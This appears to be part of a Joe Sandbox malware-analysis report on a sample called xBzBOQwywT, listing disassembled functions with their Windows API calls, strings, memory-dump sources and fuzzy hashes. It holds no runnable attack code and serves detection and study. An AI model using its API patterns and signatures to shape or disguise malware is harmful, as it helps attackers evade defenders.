                                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                        Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                        Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                        • String ID:
                                                                        • API String ID: 442100245-0
                                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                        Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 621800784-4108050209
                                                                        • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                        • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                        Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                        • String ID: \VH
                                                                        • API String ID: 3884216118-234962358
                                                                        • Opcode ID: 1e0ade88b39e0ccedd59b74e18464ea8acdbd2621335c7be91fd245b6b289ce9
                                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                        • Opcode Fuzzy Hash: 1e0ade88b39e0ccedd59b74e18464ea8acdbd2621335c7be91fd245b6b289ce9
                                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                        Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProc
                                                                        • String ID: AU3_GetPluginDetails$Wu
                                                                        • API String ID: 145871493-136108093
                                                                        • Opcode ID: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                        • Opcode Fuzzy Hash: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                        Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                        • IsMenu.USER32(?), ref: 0044854D
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                        • String ID: 0
                                                                        • API String ID: 3076010158-4108050209
                                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                        Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_memmove_wcslen
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1589278365-1403004172
                                                                        • Opcode ID: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                        • Opcode Fuzzy Hash: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                        Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Handle
                                                                        • String ID: nul
                                                                        • API String ID: 2519475695-2873401336
                                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                        Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Handle
                                                                        • String ID: nul
                                                                        • API String ID: 2519475695-2873401336
                                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                        Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 0-1011021900
                                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                        Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                        • GetFocus.USER32 ref: 0046157B
                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                        • __swprintf.LIBCMT ref: 00461608
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                        • String ID: %s%d
                                                                        • API String ID: 2645982514-1110647743
                                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                        Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                        Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 3488606520-0
                                                                        • Opcode ID: a3e4c367151313cacd09497d4593ba740deb72eade0fae61a0e0f146dff54cf8
                                                                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                        • Opcode Fuzzy Hash: a3e4c367151313cacd09497d4593ba740deb72eade0fae61a0e0f146dff54cf8
                                                                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                        Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
